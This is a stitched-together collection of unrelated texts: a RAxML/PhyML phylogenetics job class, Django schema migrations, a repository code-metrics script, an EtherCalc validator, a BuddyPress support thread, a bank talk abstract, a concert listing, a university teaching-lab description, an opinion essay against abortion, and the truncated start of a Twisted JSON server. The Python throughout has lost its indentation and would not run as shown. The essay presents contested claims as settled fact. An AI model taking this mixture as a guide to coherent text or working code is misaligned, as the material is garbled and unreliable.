log.log(24, "Using alg partitions %s" %self.partitions_file)
args['-q'] = pjoin(GLOBALS["input_dir"], self.partitions_file)
tree_job = Job(self.raxml_bin, args, parent_ids=[self.nodeid])
tree_job.jobname += "-"+self.model_string
tree_job.cores = self.threads
# Register input files necessary to run the job
tree_job.add_input_file(self.alg_phylip_file)
if self.constrain_tree:
tree_job.add_input_file(self.constrain_tree)
if self.partitions_file:
tree_job.add_input_file(self.partitions_file)
self.jobs.append(tree_job)
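# The jobs built below add branch support in one of three ways, depending on
# the _bootstrap setting: "alrt" runs RAxML -f J (SH-like aLRT on the best
# tree), "alrt_phyml" runs PhyML with --bootstrap -2 to evaluate the RAxML
# tree, and an integer N runs N bootstrap replicates (-N/-b) that are then
# drawn onto the best tree with -f b.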
self.out_tree_file = os.path.join(tree_job.jobdir,
"RAxML_bestTree." + self.alg_phylip_file)
if self.bootstrap == "alrt":
alrt_args = tree_job.args.copy()
if self.constrain_tree:
del alrt_args["-g"]
if self.partitions_file:
alrt_args["-q"] = args['-q']
alrt_args["-f"] = "J"
alrt_args["-t"] = self.out_tree_file
alrt_job = Job(self.raxml_bin, alrt_args,
parent_ids=[tree_job.jobid])
alrt_job.jobname += "-alrt"
alrt_job.dependencies.add(tree_job)
alrt_job.cores = self.threads
# Register necessary input files
alrt_job.add_input_file(self.alg_phylip_file)
if self.partitions_file:
alrt_job.add_input_file(self.partitions_file)
self.jobs.append(alrt_job)
self.alrt_job = alrt_job
elif self.bootstrap == "alrt_phyml":
alrt_args = {
"-o": "n",
"-i": self.alg_phylip_file,
"--bootstrap": "-2",
"-d": self.seqtype,
"-u": self.out_tree_file,
"--model": self.model,
"--quiet": "",
"--no_memory_check": "",
}
#if self.constrain_tree:
# alrt_args["--constraint_tree"] = self.constrain_tree
alrt_job = Job(self.conf["app"]["phyml"],
alrt_args, parent_ids=[tree_job.jobid])
alrt_job.add_input_file(self.alg_phylip_file, alrt_job.jobdir)
alrt_job.jobname += "-alrt"
alrt_job.dependencies.add(tree_job)
alrt_job.add_input_file(self.alg_phylip_file)
self.jobs.append(alrt_job)
self.alrt_job = alrt_job
else:
# Bootstrap calculation
boot_args = tree_job.args.copy()
boot_args["-n"] = "bootstraps."+boot_args["-n"]
boot_args["-N"] = int(self.bootstrap)
boot_args["-b"] = 31416
boot_job = Job(self.raxml_bin, boot_args,
parent_ids=[tree_job.jobid])
boot_job.jobname += "-%d-bootstraps" %(boot_args['-N'])
boot_job.dependencies.add(tree_job)
boot_job.cores = self.threads
# Register necessary input files
boot_job.add_input_file(self.alg_phylip_file)
if self.constrain_tree:
boot_job.add_input_file(self.constrain_tree)
if self.partitions_file:
boot_job.add_input_file(self.partitions_file)
self.jobs.append(boot_job)
# Bootstrap drawing on top of best tree
bootd_args = tree_job.args.copy()
if self.constrain_tree:
del bootd_args["-g"]
if self.partitions_file:
del bootd_args["-q"]
bootd_args["-n"] = "bootstrapped."+ tree_job.args["-n"]
bootd_args["-f"] = "b"
bootd_args["-t"] = self.out_tree_file
bootd_args["-z"] = pjoin(boot_job.jobdir, "RAxML_bootstrap." + boot_job.args["-n"])
bootd_job = Job(self.raxml_bin, bootd_args,
parent_ids=[tree_job.jobid])
bootd_job.jobname += "-bootstrapped"
bootd_job.dependencies.add(boot_job)
bootd_job.cores = self.threads
self.jobs.append(bootd_job)
self.boot_job = boot_job
self.bootd_job = bootd_job
def finish(self):
#first job is the raxml tree
def parse_alrt(match):
dist = match.groups()[0]
support = float(match.groups()[1])/100.0
return "%g:%s" %(support, dist)
if self.bootstrap == "alrt":
alrt_tree_file = os.path.join(self.alrt_job.jobdir,
"RAxML_fastTreeSH_Support." + self.alrt_job.args["-n"])
raw_nw = open(alrt_tree_file).read()
try:
nw, nsubs = re.subn(":(\d+\.\d+)\[(\d+)\]", parse_alrt, raw_nw, flags=re.MULTILINE)
except TypeError:
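# Python < 2.7: re.subn() has no flags= keyword; drop newlines instead.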
raw_nw = raw_nw.replace("\n","")
nw, nsubs = re.subn(":(\d+\.\d+)\[(\d+)\]", parse_alrt, raw_nw)
if nsubs == 0:
log.warning("alrt values were not detected in raxml tree!")
tree = Tree(nw)
elif self.bootstrap == "alrt_phyml":
alrt_tree_file = os.path.join(self.alrt_job.jobdir,
self.alg_phylip_file +"_phyml_tree.txt")
tree = Tree(alrt_tree_file)
else:
alrt_tree_file = os.path.join(self.bootd_job.jobdir,
"RAxML_bipartitions." + self.bootd_job.args["-n"])
nw = open(alrt_tree_file).read()
tree = Tree(nw)
tree.support = 100
for n in tree.traverse():
if n.support >1:
n.support /= 100.
else:
n.support = 0
TreeTask.store_data(self, tree.write(), {})
|
Abstract: Model Governance is arguably the most important (and the most unloved) part of any Data Science project within any organisation. The ability to operate safely at scale is what will enable Lloyds Banking Group to use Data Science to improve the lives of our ~20m customers across the UK. We are pioneering a new way of working which combines the wide breadth of data science with the delivery rigour of DevOps and Agile. Taking the pain out of Model Governance means that Data Scientists can focus on doing what they do best: delivering game-changing models across our entire organisation. In this session we’ll share our lessons learned, the growing pains and how we’re poised to deliver the next generation of Machine Learning and AI projects within Lloyds Banking Group.
Bio: Tom has spent the past few years building the Data Science Centre of Excellence at Lloyds Banking Group. With a background in Physics and Satellite Engineering, Tom didn't expect to end up working in the finance sector. However, having started his career in retail credit risk, Tom saw the potential to bring the benefits of Machine Learning and AI to the masses and is now pioneering new ways of delivering change in the UK financial sector. |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
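# Auto-generated South schema migration: widens the uuid columns on Location,
# TransitRoute and Region from 36 to 40 characters; backwards() restores the
# original length.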
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Location.uuid'
db.alter_column(u'mtlocation_location', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
# Changing field 'TransitRoute.uuid'
db.alter_column(u'mtlocation_transitroute', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
# Changing field 'Region.uuid'
db.alter_column(u'mtlocation_region', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
def backwards(self, orm):
# Changing field 'Location.uuid'
db.alter_column(u'mtlocation_location', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
# Changing field 'TransitRoute.uuid'
db.alter_column(u'mtlocation_transitroute', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
# Changing field 'Region.uuid'
db.alter_column(u'mtlocation_region', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
models = {
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'mtlocation.gplace': {
'Meta': {'object_name': 'GPlace', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'international_phone_number': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'local_phone_number': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'rating': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '4', 'decimal_places': '2', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'types': ('mobiletrans.mtlocation.fields.SeparatedValuesField', [], {'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'vicinity': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.hospital': {
'Meta': {'object_name': 'Hospital', '_ormbases': [u'mtlocation.Location']},
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.landmark': {
'Meta': {'object_name': 'Landmark', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'architect': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'build_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'landmark_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.library': {
'Meta': {'object_name': 'Library', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hours': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.location': {
'Meta': {'object_name': 'Location'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'point': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '255', 'populate_from': 'None', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'mtlocation.neighborhood': {
'Meta': {'object_name': 'Neighborhood', '_ormbases': [u'mtlocation.Region']},
'long_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
u'region_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Region']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.region': {
'Meta': {'object_name': 'Region'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'area': ('django.contrib.gis.db.models.fields.PolygonField', [], {}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '255', 'populate_from': 'None', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'mtlocation.transitroute': {
'Meta': {'object_name': 'TransitRoute'},
'color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'long_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'route_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'text_color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'})
},
u'mtlocation.transitstop': {
'Meta': {'object_name': 'TransitStop', '_ormbases': [u'mtlocation.Location']},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'location_type': ('django.db.models.fields.IntegerField', [], {}),
'route': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['mtlocation.TransitRoute']", 'null': 'True', 'blank': 'True'}),
'stop_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'stop_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.zipcode': {
'Meta': {'object_name': 'Zipcode', '_ormbases': [u'mtlocation.Region']},
u'region_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Region']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['mtlocation']
|
Kennesaw State University School of Music presents Jazz Ensembles.
"Jazz Ensembles" (2014). School of Music Concert Programs. 406. |
import json
import os
import subprocess
import git
import pandas
import shutil
from git import Repo
from shared_constants import data_dir, repo_candidates_filename
temp_repo_dir = "temp-repo"
code_metrics_file = "code-metrics.csv"
code_metrics_folder = "code-metrics"
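# The per-repo CSVs come from the bundled CK jar (invoked in compute_metrics
# below), which computes class-level OO metrics for Java sources; the exact
# metric set depends on the CK version and is treated as opaque here.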
def read_json(filename):
print("reading result from {}/{}".format(data_dir, filename))
with open("{}/{}.json".format(data_dir, filename), "r") as file:
data = json.load(file)
return data
def main():
# for all repos
candidate_repos = read_json(repo_candidates_filename)
# create the folder where to store the code metrics
if not os.path.exists("{}/{}".format(data_dir, code_metrics_folder)):
os.makedirs("{}/{}".format(data_dir, code_metrics_folder))
metrics = None
for i in range(0, len(candidate_repos)):
# for i in range(0, 10):
# create the folder where to store the repos temporarily
if not os.path.exists(temp_repo_dir):
os.makedirs(temp_repo_dir)
candidate_repo = candidate_repos[i]
# download repo
git_url = candidate_repo["html_url"]
repo_name = candidate_repo["name"]
print("============================================")
print("cloning repository {}".format(repo_name))
try:
Repo.clone_from(git_url, temp_repo_dir)
except git.exc.GitCommandError:
print("error cloning repository")
continue
# calculate code metrics on last snapshot
print("calculating code metrics")
repo_id = candidate_repo["id"]
output_file = "{}/{}/{}-{}".format(data_dir, code_metrics_folder, repo_id, code_metrics_file)
if not compute_metrics(output_file):
continue
temp_frame = prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name)
if metrics is None:
metrics = temp_frame
else:
metrics = pandas.concat([metrics, temp_frame], ignore_index=True)
print("save data to csv")
metrics.to_csv("{}/final-{}".format(data_dir, code_metrics_file))
shutil.rmtree(temp_repo_dir)
def compute_metrics(output_file):
# The CK jar occasionally dies with e.g. 'Exception in thread "main"
# java.lang.NullPointerException...'; treat any failure as a skip.
# Reference invocation:
#   java -jar ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar temp-repo/ data/36057260-code-metrics.csv
try:
subprocess.run(
" ".join(
["java", "-jar", "ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar", temp_repo_dir, output_file]
),
shell=True, check=True,
timeout=60 * 10
)
except subprocess.CalledProcessError:
print("exception analysing the repository - skipping")
shutil.rmtree(temp_repo_dir)
return False
except subprocess.TimeoutExpired:
print("timeout analysing the repository - skipping")
shutil.rmtree(temp_repo_dir)
return False
return True
def prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name):
# analyse code quality vs stars and num contributors
print("preparing data")
metrics_raw = pandas.read_csv(output_file)
metrics_raw.pop("file")
metrics_raw.pop("class")
metrics_raw.pop("type")
# for each metric compute mean, median, Q1, and Q3
mean = metrics_raw.mean().rename(lambda x: "average_{}".format(x))
median = metrics_raw.median().rename(lambda x: "median_{}".format(x))
q1 = metrics_raw.quantile(q=0.25).rename(lambda x: "Q1_{}".format(x))
q3 = metrics_raw.quantile(q=0.75).rename(lambda x: "Q3_{}".format(x))
temp_frame = pandas.DataFrame(pandas.concat([mean, median, q1, q3])).T
temp_frame['id'] = repo_id
temp_frame['name'] = repo_name
temp_frame['stars'] = candidate_repo["stargazers_count"]
temp_frame['contributors_total'] = candidate_repo["num_contributors"]
return temp_frame
if __name__ == '__main__':
main()
|
I installed the latest version of wp and bp profile search.
When I type something into the form (for example field “Name”) the result members page always shows all members and does not filter with the search criteria.
The search criteria (Name: asdlkjdsakjladsjklsdalkj) is shown at the result page but the member list is not filtered with this criteria (Name == asdlkjdsakjladsjklsdalkj).
Does anyone have an idea what could have gone wrong?
Are you using the default BP theme? And if not, did you check question 2 in FAQ version 3.3?
My theme is a child of the bp-default theme. I also copied this file into the child theme but it did not help.
Thank you for your help – mail was sent!
Thanks to Andrea the problem was located. The “Buddypress Friends Online” – Plugin causes an error in the bp profile search plugin.
I have the same problem. But I need both: “BP Profile Search” and “Buddypress Friends Online”. Any suggestion ?
If you wish to fix “BuddyPress Friends On-Line” yourself, you can find the instructions in my Incompatible plugins page.
Andrea Tarantini, THANKS, it works now!!!
|
from validator import Validator
from collections import defaultdict
import re
class EtherValidator(Validator):
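# A rule is a 6-tuple:
#   (corpus_regex, doc_regex, domain, column_name, operator, argument)
# Supported operators (see _apply_rule): exists, doesntexist, | (span must
# equal N), ~ (cell content must match a regex), > (subspan), = (equal span
# length), == (equal span length and content).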
def __init__(self, rule):
self.corpus = rule[0]
self.doc = rule[1]
self.domain = rule[2]
self.name = rule[3]
self.operator = rule[4]
self.argument = rule[5]
def _apply_exists(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) == 0:
report += "Column named '" + self.name + "' not found<br/>"
return report, tooltip, cells
def _apply_doesntexist(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) > 0:
report += "Columns named '" + self.name + "' are not allowed<br/>"
cells += [letter + "1" for letter in col_letters]
return report, tooltip, cells
def _apply_span_equals_number(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
if len(col_letters) == 0:
report += "Column named " + self.name + " not found<br/>"
return report, tooltip, cells
for letter in col_letters:
for cell in parsed_ether[letter]:
if cell.row == "1":
continue
if self.argument == "1":
if cell.span != "1":
report += "Cell " + cell.col + cell.row + ": span is not 1<br/>"
cells.append(cell.col + cell.row)
else:
if cell.span != "" and cell.span != self.argument:
report += "Cell " + cell.col + cell.row + ": span is not " + self.argument + "<br/>"
cells.append(cell.col + cell.row)
return report, tooltip, cells
def _apply_regex(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
for letter in col_letters:
for cell in parsed_ether[letter]:
if cell.row == "1":
continue
match = re.search(self.argument, cell.content)
if match is None:
report += ("Cell " + cell.col + cell.row
+ ": content does not match pattern " + self.argument + "<br/>")
tooltip += ("Cell " + cell.col + cell.row + ":<br/>"
+ "Content: " + cell.content + "<br/>"
+ "Pattern: " + self.argument + "<br/>")
cells.append(cell.col + cell.row)
return report, tooltip, cells
def _binary_op_check_cols_exist(self, colmap):
name_letters = colmap[self.name]
arg_letters = colmap[self.argument]
if len(name_letters) == 0:
if self.operator != "==":
return "Column named " + self.name + " not found<br/>"
if len(arg_letters) == 0:
if self.operator != "==":
return "Column named " + self.argument + " not found<br/>"
return ""
def _binary_op_setup(self, parsed_ether):
colmap = parsed_ether['__colmap__'] # name -> list of col letters
name_letters = colmap[self.name]
arg_letters = colmap[self.argument]
name_tuples = defaultdict(list)
arg_tuples = defaultdict(list)
start_rows = defaultdict(list)
all_rows = []
for letter in name_letters:
for cell in parsed_ether[letter]:
start_rows[letter].append(cell.row)
# "de-merge" cell so we have an entry for every row in its span with its letter and content
for i in range(int(cell.span or 1)):  # an empty span means 1 row
row = str(int(cell.row) + i)
name_tuples[row].append((letter, cell.content))
all_rows.append(row)
# same as above with arg_letters
for letter in arg_letters:
for cell in parsed_ether[letter]:
start_rows[letter].append(cell.row)
for i in range(int(cell.span or 1)):  # an empty span means 1 row
row = str(int(cell.row) + i)
arg_tuples[row].append((letter, cell.content))
if row not in all_rows:
all_rows.append(row)
name_start_cells = []
name_start_rows = set() # for O(1) lookup
for letter in name_letters:
name_start_cells += [(letter, row) for row in start_rows[letter]]
name_start_rows = name_start_rows.union(set(row for row in start_rows[letter]))
arg_start_cells = []
arg_start_rows = set()
for letter in arg_letters:
arg_start_cells += [(letter, row) for row in start_rows[letter]]
arg_start_rows = arg_start_rows.union(set(row for row in start_rows[letter]))
return name_letters, arg_letters, name_tuples, arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, arg_start_cells, arg_start_rows
def _apply_subspan(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
# check to see if all cells in rhs are contained within cells on lhs
if row in arg_tuples and row not in name_tuples:
for letter, _ in arg_tuples[row]:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " must appear in the span of a cell in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_equal_span_length(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
if row == "1":
continue
name_len = len(name_tuples[row])
arg_len = len(arg_tuples[row])
if name_len > arg_len:
for letter, _ in name_tuples[row][arg_len:]:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
elif arg_len > name_len:
for letter, _ in arg_tuples[row][name_len:]:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
for letter, row in name_start_cells:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
for letter, row in arg_start_cells:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_equal_span_length_and_content(self, parsed_ether):
report = ''
tooltip = ''
cells = []
colmap = parsed_ether['__colmap__'] # name -> list of col letters
col_letters = colmap[self.name] # list of letters with col name
err = self._binary_op_check_cols_exist(colmap)
if err:
report += err
return report, tooltip, cells
name_letters, arg_letters, name_tuples, \
arg_tuples, start_rows, all_rows, \
name_start_cells, name_start_rows, \
arg_start_cells, arg_start_rows = self._binary_op_setup(parsed_ether)
for row in all_rows:
if row == "1":
continue
name_len = len(name_tuples[row])
arg_len = len(arg_tuples[row])
if name_len > arg_len:
for letter, _ in name_tuples[row][arg_len:]:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
elif arg_len > name_len:
for letter, _ in arg_tuples[row][name_len:]:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " has no corresponding value in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
for i in range(min(len(name_tuples[row]), len(arg_tuples[row]))):
name_letter, name_content = name_tuples[row][i]
arg_letter, arg_content = arg_tuples[row][i]
if arg_content != name_content and (row in start_rows[arg_letter] or row in start_rows[name_letter]):
cells.append(name_letter + row)
cells.append(arg_letter + row)
report += ("Cells " + name_letter + row
+ " and " + arg_letter + row
+ " must have equivalent content.<br/>")
for letter, row in name_start_cells:
if row not in arg_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(arg_letters) + "<br/>")
for letter, row in arg_start_cells:
if row not in name_start_rows:
cells.append(letter + row)
report += ("Cell " + letter + row
+ " needs a span of equal length beginning in one of these columns: "
+ ", ".join(name_letters) + "<br/>")
return report, tooltip, cells
def _apply_rule(self, parsed_ether):
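        # Operator summary: 'exists'/'doesntexist' check column presence;
        # '|' requires a span length equal to a number; '~' applies a regex;
        # '>' requires subspan containment; '=' requires equal span lengths;
        # '==' requires equal span lengths and equal content.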
if self.name is None:
return "", "", []
if self.operator == "exists":
return self._apply_exists(parsed_ether)
        elif self.operator == "doesntexist":
            return self._apply_doesntexist(parsed_ether)
elif self.operator == "|":
return self._apply_span_equals_number(parsed_ether)
elif self.operator == "~":
return self._apply_regex(parsed_ether)
elif self.operator == ">":
return self._apply_subspan(parsed_ether)
elif self.operator == "=":
return self._apply_equal_span_length(parsed_ether)
elif self.operator == "==":
return self._apply_equal_span_length_and_content(parsed_ether)
else:
raise Exception("Unknown EtherCalc validation operator: '" + str(self.operator) + "'")
def applies(self, doc_name, doc_corpus):
if self.corpus is not None and re.search(self.corpus, doc_corpus) is None:
return False
if self.doc is not None and re.search(self.doc, doc_name) is None:
return False
return True
def validate(self, parsed_ether):
report, tooltip, cells = self._apply_rule(parsed_ether)
return {"report": report,
"tooltip": tooltip,
"cells": cells}
|
During the past quarter century, abortion has joined race and war as one of the most controversial subjects in the United States. It is an arena of human interaction where ethics, emotions and law come together. Abortion poses a moral, social and medical dilemma that confronts many individuals and creates an emotional and violent atmosphere. Abortion stops the beating of an innocent child’s heart. The termination of a pregnancy before the fetus is capable of independent life can be either spontaneous or induced. When abortion occurs spontaneously, it is called a miscarriage. When the loss of a fetus is caused intentionally, however, it is regarded as a moral issue. Abortion destroys the lives of helpless, innocent children and is illegal in many countries.
People must no longer ignore the scientific evidence that life begins at the moment of conception. We can no longer ignore the medical and emotional problems an abortion causes women. People must stop denying the facts about the procedure, and start hearing the silent screams of an unborn child. |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('oj_core', '0008_userstatus_solved_problems'),
]
operations = [
migrations.AlterField(
model_name='status',
name='memory',
field=models.PositiveIntegerField(default=0),
),
migrations.AlterField(
model_name='status',
name='result',
field=models.PositiveSmallIntegerField(default=10),
),
migrations.AlterField(
model_name='status',
name='score',
field=models.PositiveSmallIntegerField(default=0),
),
migrations.AlterField(
model_name='status',
name='time',
field=models.FloatField(default=0),
),
migrations.AlterField(
model_name='status',
name='user',
field=models.ForeignKey(to='oj_core.UserStatus', null=True, on_delete=django.db.models.deletion.SET_NULL),
),
]
|
The Teaching Innovation Learning Lab (TILL) is a space for faculty-driven exploration and testing of innovative teaching methods that will drive success for the 21st century student.
The Teaching Innovation Learning Lab (TILL) cultivates and supports the scholarly development, investigation, and dissemination of innovative and evidence-based teaching at the University of Louisville through faculty-led experimentation, idea exchange, and cross-disciplinary collaboration.
The TILL is widely recognized as an effective professional development resource for innovative teaching and student success.
The TILL encourages, models, and supports the scholarly investigation of teaching and learning (SoTL).
UofL teachers implement and promote evidence-based teaching practices.
UofL teachers feel connected to an interdisciplinary and collaborative teaching and learning community of practice.
UofL teachers foster student engagement, learning, and success.
UofL teachers demonstrate confidence in and derive satisfaction from their teaching experiences.
The TILL classroom is a technology-rich active learning environment that is designed to foster student engagement and active learning. The moveable tables, node chairs and multiple monitors allow instructors and students to interact, teach and learn more creatively than ever before.
The TILL features three collaborate rooms outfitted with the same wireless collaboration technology found in the classroom, making them perfect for small group meetings. Reservations to use the collaborate rooms are encouraged, but drop-ins are welcome as long as space is available.
The recording studio includes everything instructors need to record audio or video material for their courses, and support staff is always on hand. Reservations to use the recording studio are encouraged, but drop-ins are also welcome.
Email us to reserve the recording studio.
The living room is perfect for one-on-one meetings, reading groups, or a satellite work space. Come on in and grab a cup of coffee! |
#!/usr/bin/env python
import json
from twisted.web import server, resource
from twisted.internet import reactor
from common import Exitaddr, options
DEFAULT_PORT = 8080
exitaddr_results = None
def addHeader(request):
h = request.responseHeaders
h.addRawHeader(b"content-type", b"application/json")
class Res(resource.Resource):
def getChild(self, name, request):
''' handle trailing / '''
if name == '':
return self
return resource.Resource.getChild(self, name, request)
class Exits(Res):
''' json dump of our state '''
def render_GET(self, request):
addHeader(request)
return json.dumps(exitaddr_results, indent=4)
class IP(Res):
''' json response with the remote host ip '''
def render_GET(self, request):
        host = request.transport.getPeer().host
